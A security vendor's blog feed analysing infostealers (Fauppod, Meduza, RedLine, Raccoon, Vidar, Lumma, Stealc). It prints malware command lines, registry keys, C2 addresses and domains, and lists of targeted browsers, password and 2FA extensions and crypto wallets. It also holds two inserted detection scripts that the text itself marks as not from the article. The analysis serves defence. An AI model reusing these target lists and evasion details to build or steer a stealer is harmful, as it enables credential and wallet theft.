Stealer Archives – Gridinsoft Blog
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.
Feed last updated: Mon, 16 Sep 2024 22:59:36 +0000

Trojan:Win32/Fauppod!ml
https://gridinsoft.com/blogs/trojanwin32-fauppod-ml/
Thu, 12 Sep 2024 15:25:21 +0000

Trojan:Win32/Fauppod!ml is a detection that is based on machine learning and is assigned to an unspecified threat type. Usually such threats are identified by behavior rather than signatures. Nonetheless, this exact malware detection poses a serious hazard, as it appears to flag the activity of a targeted infostealer trojan.

Trojan:Win32/Fauppod!ml Overview

Trojan:Win32/Fauppod!ml is a generic detection name that Microsoft Defender assigns to malware flagged by its AI-based detection system. Typically, this detection points at the activity of an infostealer that primarily targets banking data. The “ml” suffix in the detection name indicates that the verdict comes from a machine learning model rather than from traditional signature-based detection. Usually, over time, as more information about the malware’s behavior is analyzed, the detection is replaced with a more specific detection name.

Trojan:Win32/Fauppod!ml detection window

As mentioned at the beginning, the main goal of Fauppod is to steal the credentials of online accounts. One thing it goes for in particular is login credentials for online banking accounts.

The main ways this malware spreads are malicious email attachments (Word or Excel files) and downloads of game mods or other files from untrustworthy sources. Despite its focus on banking information, it is not picky about its victims and steals data from all categories of users.

Fauppod Analysis

Let’s take a closer look at the technical side of how Fauppod!ml behaves on the system. The first thing the malware does after launching is check whether it is the only copy running on the device. It does this by creating and accessing the following mutexes:

\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex
\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex

Since our sample is a DLL file, it needs a legitimate Rundll32.exe process to run. The malware copies the legitimate Rundll32.exe to the temporary folder C:\Users\User\AppData\Local\Temp\rundll32.exe and uses process hijacking techniques to run under that copy.

Next, the malware checks the UAC status and the presence of anti-malware on the system. It checks these registry keys to disable system defenses and ensure persistence:

HKEY_LOCAL_MACHINE\SOFTWARE
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Fauppod Execution

The malware executes shell commands that allow it to perform its main function:

C:\Users\User\AppData\Local\Temp\rundll32.exe rpl909.zip.dll
"C:\Windows\System32\rundll32.exe" C:\Users\A4148~1.MON\AppData\Local\Temp\b81d42902b581dd9fea37c4b6a8ff180.19772.dll,DllMain

After that, the malware deploys its payloads and injects itself into legitimate processes, which lets it operate without raising suspicion from security software. It also manipulates legitimate processes such as wmiadap.exe, svchost.exe and cmd.exe. The malware executes the following processes:

wmiadap.exe /F /T /R
%windir%\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
%windir%\system32\wbem\wmiprvse.exe
%windir%\System32\svchost.exe -k WerSvcGroup
13f43b565119f43f7155f96cafa8b05d.exe
C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\init.dll"
C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\User\Desktop\init.dll",#1
C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\User\Desktop\init.dll",#1
C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\init.dll,_Clockcould@8
C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\init.dll,_DllRegisterServer@0
C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\User\Desktop\init.dll,_Representfinish@4

So we can conclude that the malware also abuses the svchost.exe process in WerSvcGroup, which belongs to the Windows Error Reporting service. This is a common practice: malware injects code into system services to mask its actions. The 13f43b565119f43f7155f96cafa8b05d.exe executable also appears to be part of the payload.

Fauppod Connections

The malware uses both standard addresses and ports as well as non-standard ones. Among the standard ones:

GET http://watson.microsoft.com/StageOne/rundll32_exe/6_1_7600_16385/4a5bc637/StackHash_1abe/0_0_0_0/00000000/c0000005/fd8b3a80.htm?LCID=1040&OS=6.1.7601.2.00010100.1.0.48.17514&SM=LENOVO&SPN=64755N2&BV=7UET92WW%20(3.22%20)&MID=F2EC8DC6-EB4A-4B44-95EF-9B81DC7C287B

Traffic to legitimate Microsoft endpoints on standard ports helps the malware blend in with normal activity. Connections to suspicious addresses on non-standard ports, on the other hand, indicate communication with the C2 server. In our case, these addresses are:

97.107.127.161:443
45.33.94.33:5037
159.89.91.92:5037
158.69.118.130:1443

Some of the IP addresses in the list (and quite a few others that I’ve excluded for the sake of readability) correspond to compromised websites. This is a frequently used tactic: attackers use a hacked website as an intermediary command server, so the requests look legitimate to anyone who examines the traces.

Is Trojan:Win32/Fauppod!ml False Detection?

As I have mentioned several times already, Trojan:Win32/Fauppod!ml is a heuristic detection based on machine learning, which means it can sometimes produce false positives. Heuristic methods analyze file patterns, behaviors, and structural elements rather than relying on pre-defined signatures, so legitimate software with uncommon characteristics or behaviors may be flagged as suspicious. In such cases, the anti-malware software usually stops flagging the file as a threat after some time.

How to Remove Trojan Fauppod?

If you encounter Trojan:Win32/Fauppod!ml and are unsure whether it’s a false detection or a real threat, an effective approach is to scan with a third-party anti-malware solution. GridinSoft Anti-Malware is a good option that can both confirm and rule out the threat. Use the instructions below to scan your device for threats.

Meduza Stealer
https://gridinsoft.com/blogs/meduza-stealer-analysis/
Wed, 19 Jun 2024 14:20:31 +0000

The malware world evolves constantly, and it would be reckless to ignore newcomers and their potential. Meduza Stealer appears to be a pretty potent stealer variant with unique features and an unusual marketing model. Additionally, this malware may be considered the first of a new malware generation, one that breaks the old geolocation filtering rules.

What is Meduza Stealer?

Meduza is an all-encompassing infostealer that, at a glance, looks similar to the old guard. However, well-known stealers such as RedLine or Raccoon gained the ability to steal cryptocurrency data only through later updates. Meduza, on the other hand, can do this out of the box and can circumvent the trickier protection measures of crypto apps. Moreover, it covers a much longer list of wallets and browsers than any of the stealers mentioned.

The distinctive feature of Meduza Stealer is how it hides its samples. Instead of the usual packing, the developers use code obfuscation and recompilation, which lets them slip past even the most robust anti-malware engines. Neither approach sounds phenomenal on its own, but applied together, and in an unusual way, they make the result far less predictable, and far less detectable.

That is not the full list of unusual things about this malware. Price-wise, the malware is offered in 2 fixed plans plus a negotiable lifetime license. For $199 you receive the malware, all possible customization options for the payload, the admin panel, and the ability to download all the logs in one click, for a term of 1 month. The same package costs $399 for 3 months. And the cherry on top, as I said, is the ability to negotiate the price of a lifetime license. The developers are probably even ready to share the source code, but that is only a guess, based on groups that used such a model earlier.

Promotion of Meduza Stealer in Telegram. Channels are exclusively Russian.

An Offspring of Aurora Stealer?

There are plenty of examples of brand-new malware turning out to be a rebranded old sample with a slightly different team of crooks behind it. Malware is rarely developed by a single person. Developers of one malware may start working on another and bring their prior developments into the new product. Alternatively, part of a cybercrime gang that has stopped operating may decide to resume its illegal activities and rebrand its “tools” to start with a new image. One way or another, this is a common occurrence.

In the case of Meduza Stealer, things are not that straightforward. Due to its enhanced obfuscation, it is hard to say whether it shares any code with known malware families. Some malware analysts claim that Meduza is an offspring of Aurora Stealer, a malware that appeared in late 2022. Their main arguments are the similar form of the C2 calls and of the logs with collected data.

Similarity in logs of Aurora and Meduza Stealers

As you can see, Meduza’s logs resemble Aurora’s in the ASCII-styled header and some visual elements. However, that is not definitive: malware developers sometimes take inspiration from, or outright copy, elements of other malware families. Researchers also point to similar file naming conventions, but that is not strong evidence either.

This, however, caused a harsh reaction from the malware developers. In their “support” channel they dismissed all the evidence as rubbish and also said they had picked up the trail of whoever leaked the malware build. There is also solid evidence for Meduza’s originality: it is written in C++, which is nowhere near the Golang used in Aurora Stealer.

The reaction of the Meduza developer to the analyst’s claims that the malware is an Aurora Stealer copy

Meduza Stealer Analysis: Catch Me or I Catch You

The threat posed by a specific malware sample roughly depends on two factors: how hard it is to detect and how much damage it can deal. Meduza Stealer tries to outpace its counterparts on both. It is certainly not the stealthiest malware, and there are samples that steal even more data, but few can boast a combination of the two. Meduza does.

Meduza Stealer Exec Chain

In the picture above you can see a simplified scheme of how Meduza Stealer operates. First, it checks the geolocation of the attacked system by its IP address. Here lies another unusual feature of this malware: it has the country ban list typical of malware from Russia, but the list does not include Ukraine. Instead, the malware exits if the IP of the attacked system is in Georgia. The latter has become quite a popular destination among Russians trying to avoid enlistment in the army. Overall, the malware will not run in Armenia, Belarus, Georgia, Kazakhstan, Kyrgyzstan, Moldova, Russia, Tajikistan and Turkmenistan.

Code in the malware’s PE file that bans its execution in certain countries.

The very next step is contacting the C2 server. This is uncommon among stealers, which prefer to contact the C2 only after succeeding in stealing data. Meduza instead contacts the server immediately after confirming that the system is not in a forbidden location, but without taking any further action. The malware sends an empty POST request that receives no response from the server; it continues only once the connection succeeds.

Data Gathering

As I said, Meduza is notable for the outrageously large number of web browsers, desktop apps, and crypto wallets it can rummage through. More common malware samples usually stop at the most popular apps and wallets, plus a few alternative ones. This one, however, does not disdain even the underdogs: Kinza, Mail.ru, Atom, Amigo. Some of them are even considered PUPs by security vendors, and I bet you didn’t know some of them existed.

List of browsers Meduza gathers data from:

Chrome, Chrome Beta, Chrome SxS, 360ChromeX, ChromePlus,
Chromium, Edge, Brave Browser, Epic Privacy Browser, Amigo,
Vivaldi, Kometa, Orbitum, Atom, Comodo Dragon,
Torch, Comodo, Slimjet, 360Browser, 360se6,
Baidu Spark, Falkon, AVAST Browser, Waterfox, BitTubeBrowser,
NetboxBrowser, Mustang, InsomniacBrowser, Maxthon, Viasat Browser,
Opera Stable, Opera Neon, Opera Crypto Developer, Opera GX Stable, QQBrowser,
SLBrowser, K-Meleon, Go! Secure Browser, Sputnik,
Nichrome, CocCoc Browser, Uran, Chromodo, YandexBrowser,
7Star, Chedot, CentBrowser, Iridium, Naver Whale,
Titan Browser, SeaMonkey, UCBrowser, CLIQZ, Flock,
BlackHawk, Sidekick, Basilisk, GhostBrowser, GarenaPlus,
URBrowser, IceDragon, CryptoTab Browser, Pale Moon, Superbird,
Elements Browser, Citrio, Xpom, ChromiumViewer, QIP Surf,
Liebao, Coowon, Suhba, TorBro, RockMelt,
Bromium, Kinza, CCleaner Browser, AcWebBrowserr, CoolNovo,
SRWare Iron, Mozilla Firefox, AVG Browser, Thunderbird, Blisk,
Cyberfonx, SwingBrowser, Mozilla IceCat, SalamWeb, SlimBrowser

Browsers handle passwords and autofill data in different ways, and the malware has an approach for each. For browsers that store such data in databases, the malware issues an SQL query that extracts everything of value. Other, less secure browsers keep this information in plain-text files, which are not hard to find.

Another point of interest for stealer malware in web browsers is cookie files. Cookies can contain all sorts of things, from nearly useless shopping cart contents to session tokens, usernames, emails, and the like. Cookie files are highly valuable for data theft, especially when they are fresh. One might say, just like the real ones.

Desktop apps

Aside from web browsers, Meduza Stealer gathers information from several desktop applications, namely Telegram, Steam, and various Discord clients. To get hold of Steam session tokens, the malware reads the program’s registry key in the CurrentUser hive. The HKCU\Software\Valve\Steam key contains a lot of information besides login data and session information, so the malware does not go purely for the account.

Telegram does not keep login details in such an accessible form, though the malware manages to gather sensitive information in a similar way. By checking these two keys, Meduza can obtain information about the system kept in the Telegram session data, app versions, usernames, and other important details.


HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C4A4AE8F-B9F7-4CC7-8A6C-BF7EEE87ACA5}_is1

Discord is also a tough nut when it comes to grabbing session info. For that reason, the malware limits itself to the system info recorded in a session, app configurations, and the like. Unlike with the two other apps, this is done directly in the program’s folder. The malware targets several different editions of Discord, as the free API allows the creation of forks and user modifications.

2FA Extensions

Well, did I say that Meduza is ravenous when it comes to data gathering? Hold your 2FA browser extensions close: the malware hunts them as well. The list of add-ons it targets is not as long as the browser list, though there are not that many such add-ons in the first place.

Extension name Web Store ID
Authenticator 2FA bhghoamapcdpbohphigoooaddinpkbai
Authenticator 2FA ocglkepbibnalbgmbachknglpdipeoio
EOS Authenticator oeljdldpnmdbchonielidgobddffflal
Trezor Password Manager imloifkgjagghnncjkhggdhalmcnfklk
GAuth Authenticator ilgcnhelpchnceeipipijaljkblbcobl
1Password oeljdldpnmdbchonielidgobddffflal
1Password dppgmdbiimibapkepcbdbmkaabgiofem
Dashlane Password Manager fdjamakpfbbddfjaooikfcpapjohcfmg
Dashlane Password Manager gehmmocbbkpblljhkekmfhjpfbkclbph
Bitwarden Password Manager nngceckbapebfimnlniiiahkandclblb
Bitwarden Password Manager jbkfoedolllekgbhcbcoahefnbanhhlh
NordPass jbkfoedolllekgbhcbcoahefnbanhhlh
Keeper Password Manager bfogiafebfohielmmehodmfbbebbbpei
RoboForm pnlccmojcmeohlpggmfnbbiapkmbliob
RoboForm ljfpcifpgbbchoddpjefaipoiigpdmag
SSO Authenticator nhhldecdfagpbfggphklkaeiocfnaafm
Zoho Vault igkpcodhieompeloncfnbekccinhapdb
KeePassXC dppgmdbiimibapkepcbdbmkaabgiofem
KeePassXC pdffhmdngciaglkoonimfcmckehcpafo
LastPass hdokiejnpimakedhajhdlcegeplioahd
LastPass bbcinlkgjjkejfdpemiealijmmooekmp
BrowserPass naepdomgkenhinolocfifgehidddafch
MYKI bmikpgodpkclnkgmnpphehdgcimmided
MYKI nofkfblpeailgignhkbnapbephdnmbmn
Splikity jhfjfclepacoldmjmkmdlmganfaalklb
CommonKey chgfefjpcobfbnpmiokfjjaglahmnded
Authy gaedmjdfmmahhbjefcbgaolhhanlaolb

Cryptocurrency wallets

Gathering data about crypto wallets was not widespread among older-generation stealers. Over time, most of the families we know and love adopted such functionality. Modern-generation stealers have it by default, which probably explains the sheer number of wallets they can gather data from.

MetaMask, Binance Wallet, BitApp Wallet, Coin98 Wallet,
SafePal Wallet, DAppPlay, Guarda, EQUA Wallet,
GuildWallet, Casper Wallet, ICONex, Math Wallet,
Starcoin, Hiro Wallet, MetaWallet, Swash,
Finnie, Keplr, Crocobit Wallet, Oxygen,
MOBOX WALLET, Phantom, TronLink, XDCPay,
Ton, Sollet, Slope, DuinoCoin Wallet,
LeafWallet, Brave Wallet, Opera Wallet, CWallet,
Flint Wallet, Exodus Web3 Wallet, Trust Wallet, Crypto Airdrops & Bounties,
Nifty Wallet, Liquality, Ronin Wallet, Oasis,
Temple, Pontem Aptos Wallet, Solflare Wallet, Yoroi,
iWallet, Wombat Gaming Wallet, Coinbase Wallet, MEW CX,
Jaxx Liberty, OneKey, Hycon Lite Client, SubWallet,
Goby, TezBox, ONTO Wallet, Hashpack,
Cyano, Martian Wallet, Sender Wallet, Zecrey,
Auro, Terra Station, KardiaChain, Rabby Wallet,
NeoLine, Nabox, XDEFI, KHC,
OneKey, CLW, Polymesh, ZilPay,
Byone, Eternl, Nami, Maiar DeFi Wallet

This extensive list contains crypto wallets that can have both desktop and in-browser forms. In such cases, malware treats them in a separate way – by collecting data from registry entries they leave. Here are some examples of keys the malware can read to collect login data from your crypto wallet:


HKCU\SOFTWARE\Etherdyne\Etherwall\geth
HKCU\SOFTWARE\monero-project\monero-core
HKCU\SOFTWARE\BitcoinCore\BitcoinCore-Qt
HKCU\SOFTWARE\LitecoinCore\LitecoinCore-Qt
HKCU\SOFTWARE\DashCore\DashCore-Qt
HKCU\SOFTWARE\DogecoinCore\DogecoinCore-Qt

System fingerprinting

To distinguish between attacked systems, stealers commonly collect some trivial information about the system. Meduza is no exception: it collects all the basic details that identify the computer among others.

  • System build details
  • Username
  • Computer name
  • Screen Resolution details
  • Screenshot
  • OS details
  • CPU details
  • RAM details
  • GPU
  • Hardware ID details
  • Execute path
  • Public IP
  • Geo
  • Time
  • TimeZone

Another application for such data comes into view when we remember that Meduza also collects browser cookies. The combination of cookies, passwords, and system information makes it possible to create a complete copy of the device, at least from the point of view of a website. There have even been Darknet services dedicated specifically to system profile spoofing: you input the cookies and system specs, and it makes your system indistinguishable from the original one. This helps circumvent even the most sophisticated protection mechanisms.

Data extraction

All the data Meduza Stealer manages to collect from the infected system is stored in a dedicated folder created after the malware unpacks and executes. When it comes to sending the data to the command server, the malware archives it and uploads it, nothing unusual there. Since the malware uses an encrypted connection for C&C communication, the exfiltration is not easy to detect.

Code responsible for the C2 server connection in Meduza Stealer.

Unlike “classic” stealers such as Vidar, Meduza does not self-destruct once it finishes collecting data. It keeps running in the background, pinging the C2 periodically and waiting for commands. There is a self-removal command, but it is most likely sent only in exceptional cases.
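Periodic pings to a C2 are one of the few things encrypted traffic cannot hide: the timing of the connections is visible even when their content is not. The same applies to the Fauppod connections listed earlier, where the C2 sat on a non-standard port. The script below is an added example, not code from the article or from GridinSoft: it groups an outbound connection log by (source, destination, port) and flags flows whose inter-connection intervals are nearly constant. The one-line-per-connection log format is an assumption, and the sample lines are constructed; 158.69.118.130:1443 is the address quoted in the Fauppod section, while 203.0.113.10 (a documentation-range address) stands in for an ordinary web peer.

```python
"""Flag flows that connect at near-constant intervals (C2 beaconing).

Added example, not the article's code. The log format "timestamp src dst port"
is an assumption; SAMPLE_LOG is constructed.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed outbound connection log: one line per TCP connection.
SAMPLE_LOG = """\
2024-06-19T10:00:00 10.0.0.5 158.69.118.130 1443
2024-06-19T10:00:02 10.0.0.5 203.0.113.10 443
2024-06-19T10:01:00 10.0.0.5 158.69.118.130 1443
2024-06-19T10:01:45 10.0.0.5 203.0.113.10 443
2024-06-19T10:02:01 10.0.0.5 158.69.118.130 1443
2024-06-19T10:02:10 10.0.0.5 203.0.113.10 443
2024-06-19T10:03:00 10.0.0.5 158.69.118.130 1443
2024-06-19T10:03:59 10.0.0.5 158.69.118.130 1443
2024-06-19T10:04:33 10.0.0.5 203.0.113.10 443
2024-06-19T10:05:00 10.0.0.5 158.69.118.130 1443
2024-06-19T10:09:40 10.0.0.5 203.0.113.10 443
"""


def parse_log(text):
    """Yield (timestamp, src, dst, port) tuples; malformed lines are skipped."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, src, dst, port = parts
        yield datetime.fromisoformat(ts), src, dst, int(port)


def find_beacons(text, min_connections=5, max_cv=0.2):
    """Return {(src, dst, port): {"mean_interval", "cv", "count"}} for flows with at least
    min_connections connections whose gaps have a coefficient of variation <= max_cv.

    The coefficient of variation (stdev / mean) is scale-free, so a 60 s and a 600 s
    beacon are judged by the same threshold.
    """
    flows = defaultdict(list)
    for ts, src, dst, port in parse_log(text):
        flows[(src, dst, port)].append(ts)

    beacons = {}
    for key, stamps in flows.items():
        if len(stamps) < min_connections:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg <= 0:          # all connections in the same second: a burst, not a beacon
            continue
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            beacons[key] = {"mean_interval": avg, "cv": cv, "count": len(stamps)}
    return beacons


if __name__ == "__main__":
    for (src, dst, port), info in find_beacons(SAMPLE_LOG).items():
        print(f"{src} -> {dst}:{port}: {info['count']} connections, "
              f"every {info['mean_interval']:.0f}s (cv={info['cv']:.3f})")
```

On the constructed log the flow to 158.69.118.130:1443 (five gaps of 59 to 61 seconds) is reported, while the flow to 203.0.113.10:443, whose gaps range from 25 s to 5 minutes, is not. A fixed CV threshold is defeated by malware that adds large random sleep jitter, so in practice this check is combined with destination signals such as the non-standard port or an address with no web reputation, exactly the kind of address listed in the Fauppod section.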

How to protect against Meduza Stealer?

The ways to protect against Meduza are essentially the same as for any other stealer. However, the exceptional detection evasion capabilities of this malware dictate one difference: for efficient prevention of Meduza Stealer activity, strong heuristic protection is essential.

Be careful with all things that can act as a malware source. Email spam or phishing posts in social media are among the most exploited ways of malware spreading. A less popular, but sometimes even more efficient approach is exploiting Google Ads in search results. Fraudsters will do their best to make you believe that the thing is legit, and you should not fear interacting with it.

Implement preventive anti-malware measures. To weed out malware with such an unusual detection evasion model the program should include a sturdy heuristic engine. Additionally, you can seek solutions with email protection functions and CDR applications. They help you to secure one of the possible attack vectors.

Avoid cracked software. Yet another channel for malware spreading is cracked programs; they have served this purpose for over two decades now. And even though their share has shrunk in recent years, you can still pick up something nasty there. A program crack can deliver dropper malware, which will then install anything else, from spyware to ransomware.

Meduza Stealer Removal

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

What is Infostealer Malware? Top 5 Stealers in 2024
https://gridinsoft.com/blogs/infostealer-malware-top/
Wed, 19 Jun 2024 13:16:29 +0000

The cybercrime world changes rapidly: it expands, collapses, and evolves both extensively and intensively. One of the most widespread malware types in the modern threat landscape, infostealer malware, appears to be entering a new stage of development. Though its major names remain the same, some new malware families with promising features have appeared. Let’s have a look at all of them and see what to expect.

Infostealer Malware Market in 2024

Infostealer malware has gained more and more popularity over the last decade, but the biggest spike happened during the last few years. The first noticeable factor is the massive popularisation of cryptocurrencies. How is that related? Well, relatively large amounts of money have always attracted the attention of hackers. Carding and banking fraud, however, are now less effective, as banks implemented strict control measures back in the early 2010s. Cryptocurrency wallets, on the other hand, have little to no such control, making them ideal targets for infostealers.

Infostealer Malware stats

Another reason spyware and infostealers became so popular and widespread is their massive use in attacks on corporations. Even when hackers break into a network to encrypt files and demand a ransom for their decryption, they also drop infostealer malware that exfiltrates as much valuable information as possible. Afterwards, the hackers demand an additional ransom to keep this data secret. Some attacks are based exclusively on stealers, and the results are either sold on the Darknet or used for business email compromise (BEC) attacks. Additionally, some ransomware groups that target home users started adding spyware to their attack chain a while ago.

Infostealer Malware Market Leaders

As of May 2024, 3 major malware families dominate the market: RedLine, Raccoon, and Vidar. None of them is new at this point, with Vidar having been active the longest. Let’s have a closer look at them, starting with the youngest one.

RedLine Infostealer

RedLine infostealer appeared in 2020 and has seen pretty wide use in various cyberattacks. Most of the time, however, it has been aimed at individual users, as its functionality fits that purpose best. Key targets for RedLine are cryptocurrency wallet data, from both desktop versions and browser plugins. Still, it can gather other data, such as FTP/VPN configurations and session tokens for apps like Discord or Steam. Having held a pretty large market share at the start of 2024, it became much less active from March 2024 onward. Yet the enormous number of new samples that have appeared recently may be a sign that another campaign is being prepared. The RedLine developers find buyers for this malware through Telegram groups and Darknet forums.

Telegram group post that advertises RedLine malware

Raccoon Infostealer

Raccoon has key properties similar to those RedLine offers, but can capture a much wider selection of data. In its scope are browser autofill files, cookies, and online banking credentials, on top of the ability to pluck cryptocurrency wallets. Since its emergence in early 2019, Raccoon has held a dominant position on the market, and it still does. In the summer of 2022, its developers released a new version, promising faster and more reliable malware for a slightly higher price. Like RedLine, Raccoon stealer is commonly spread through ads in Telegram channels and bots; Darknet platforms are less preferred, though they are used for public communication.

Admin panel of Raccoon stealer

Vidar Infostealer

Among the top 3 infostealer threats, Vidar is most definitely the dark horse. It is considered an offspring of Arkei stealer, a malware that made a name for itself back in the early 2010s. After its launch in 2018, it never held a dominant share of the market, being at best #2. Nonetheless, its efficiency and unique design are hard to deny: Vidar offers a modular approach to data stealing and has an uncommon way of communicating with its C2. It also self-destructs after successful data exfiltration. Additionally, it is often spread bundled with other malware, such as STOP/Djvu ransomware. Its sales methods, however, are less unique: it uses Telegram channels dedicated to malware promotion.

Newbies

It would be quite reckless to deny the importance of new malware. For sure, not all of them will make it even to the 1-year milestone, but Raccoon and Vidar once were newbies as well – and you can see where they are. Among stealer families that popped out over the last year, there are a couple you should keep in mind.

Lumma

Also known as LummaC2, this infostealer appeared in December 2022. At first acquaintance with this malware, you can already see some fairly noteworthy details. In the “pricing plans” panel, the developers mention the ability to configure the payload in a specific manner and to add network sniffer functionality. The availability of these functions depends on the price of the chosen plan: $250, $500 or $1,000. Additionally, the developers offer access to the malware and panel source code, along with the right to resell it, for $20,000. Other functions are available regardless of the plan. Lumma can grab browser cookies, autofill forms, data from 2FA plugins/apps, and crypto wallet credentials, from both apps and browser plugins.

Pricing for different LummaC2 stealer plans, posted on the Darknet website

Stealc

Stealc is another youngster, first mentioned on January 9, 2023 on several Darknet forums. It appears to borrow best practices from the most popular stealers, which already makes it pretty potent. Among its unusual practices are a free test and weekly releases of new features. Otherwise, the malware has the classic feature set of a modern infostealer: it gathers data from web browsers (cookies, autofill forms, etc.), cryptocurrency wallet extensions, and even email clients and messengers. Such extended functionality, especially compared to other new malware examples, will definitely be appreciated.

How to Protect Against Infostealer Malware?

Protecting against threats like infostealers is always a tough question. The thing is, such malware is forced to evolve constantly, finding new ways to be more efficient and stealthy, which makes any advice that reacts to specific malware features useless in the long term. However, there are still some things infostealer developers can’t (or don’t want to) change.

Beware of spear phishing. It may take different forms, from email messages sent from a compromised business mailbox to social media posts from the hijacked account of a legitimate company. But even with all that sophistication, hackers can never build a pretext that survives a basic check. Most commonly, they lure victims with urgent events or exclusive deals. A simple source check will reveal any possible scam: if the impersonated company has nothing to do with such claims, ignore the alarming message.

Avoid using pirated software. Despite losing a significant share to email spam, software cracks are still used for malware spreading. Torrent trackers and third-party websites are flooded with offers of brand-new software, and it is anyone’s guess which one is infected. Using only licensed software will not only keep you on the right side of the law, but also remove this infection vector entirely. And dealing with the consequences of malware activity will cost you far more than you can save on program licences.

Protect your system with proper anti-malware software. It is better to steer clear of muddy waters altogether, but having a security tool that takes care of problems will make your life much easier. Not every utility will do, as infostealer malware has tricks to evade basic anti-malware software. GridinSoft Anti-Malware gives them no chance, thanks to its three-component detection system and constant updates that keep its databases relevant.


The post What is Infostealer Malware? Top 5 Stealers in 2024 appeared first on Gridinsoft Blog.

Lumma Stealer Spreads Via Fake Browser Updates, Uses ClearFake
https://gridinsoft.com/blogs/lumma-stealer-spreads-via-fake-browser-updates/
Mon, 17 Jun 2024 15:16:22 +0000

Recent research uncovered a selection of websites that deploy Lumma Stealer under the guise of a browser update. They pose as tutorial pages that offer seemingly correct guides, but then open a malicious JS iframe handled with ClearFake framework. Some of these sites are active for several weeks now.

Fake Tutorial Sites Spread Lumma Stealer with ClearFake Framework

A new Lumma Stealer distribution campaign apparently started on fake tutorial sites. Avast reports one specific example of such a page, which uses a JS framework known as ClearFake to trick the user into running a payload. The base website, pchelperspro[.]com, appears to be just a page with instructions for solving a Windows Update issue; the rest of the attack happens after the visitor spends a bit more time on it. An attentive user will notice, though, that all the buttons on the page are inactive, and that the content is in fact lifted from a different site.

The fake tutorial website looks like a regular how-to page, but there is a catch

After a short timeout, the aforementioned framework kicks in, opening a fake browser update window. The way it behaves, as well as the design of the fake update page, makes it hard to recognise as malicious, unless, of course, you know that web browsers never show such a window inside a web page to begin with. Following the guidance in the fake update window makes the user download and run a malicious PowerShell script.

The PS script, in turn, connects to the command server, fetches the final payload (Lumma Stealer) and executes it. Interestingly, the script also performs a chain of actions aimed at system fingerprinting. In particular, it launches the following executables:

C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\SecurityHealthService.exe

Addresses of command servers are hard-coded in the script text and at first glance look like sketchy online shops. However, every single domain was registered just 20 days before the analysis, which is hardly a coincidence.

Standingcomperewhitwo.shop
Innerverdanytiresw.shop
Lamentablegapingkwaq.shop
Sturdyregularrmsnhw.shop
Stickyyummyskiwffe.shop
Greentastellesqwm.shop
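The two observations above (throwaway-looking names under a cheap TLD, all registered days before the campaign) are exactly the kind of heuristic that can be applied to DNS or proxy logs. The following Python helper is an added example, not code from the original post or from Gridinsoft: it flags queried domains that are younger than 30 days or that look like the glued-word names listed above. The DNS log lines and the registration-date table are constructed for the example; in practice the dates would come from an RDAP or WHOIS lookup, and the TLD list and the 15-letter threshold are my own choices, not something the post states.

```python
import re
from datetime import date

# Constructed stand-in for RDAP/WHOIS lookups: domain -> registration date.
# These dates are made up for the example and would normally be fetched live.
REGISTRATION_DATES = {
    "standingcomperewhitwo.shop": date(2024, 5, 28),
    "innerverdanytiresw.shop": date(2024, 5, 28),
    "example-shop.com": date(2015, 3, 2),
}

# Observation date used for the age calculation (constructed).
TODAY = date(2024, 6, 17)

# Constructed DNS log, one query per line: "<timestamp> <client> <qname>".
DNS_LOG = """\
2024-06-17T10:01:02Z 10.0.0.5 standingcomperewhitwo.shop
2024-06-17T10:01:03Z 10.0.0.5 innerverdanytiresw.shop
2024-06-17T10:01:09Z 10.0.0.7 example-shop.com
2024-06-17T10:02:11Z 10.0.0.9 lamentablegapingkwaq.shop
"""

MAX_AGE_DAYS = 30
# A single label of 15+ lowercase letters (no digits or hyphens) under a cheap TLD:
# the shape of the dead-drop domains in this campaign. TLD list is an assumption.
GLUED_WORDS = re.compile(r"^[a-z]{15,}\.(shop|xyz|top|site|online)$")


def domain_age_days(domain):
    """Age of the registration in days, or None when no date is known."""
    reg = REGISTRATION_DATES.get(domain)
    return (TODAY - reg).days if reg else None


def triage_dns(log_text):
    """Return [(domain, reason), ...] for queries worth a second look."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # malformed line, skip
        domain = parts[2].lower().rstrip(".")
        reasons = []
        age = domain_age_days(domain)
        if age is not None and age <= MAX_AGE_DAYS:
            reasons.append(f"registered {age} days ago")
        if GLUED_WORDS.match(domain):
            reasons.append("glued-words name under throwaway TLD")
        if reasons:
            hits.append((domain, "; ".join(reasons)))
    return hits
```

Domain age alone produces false positives on legitimate new sites, and the name heuristic alone catches plenty of harmless shops, so the two reasons are reported together and a hit that carries both deserves priority.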

ClearFake and Lumma Stealer Short Overview

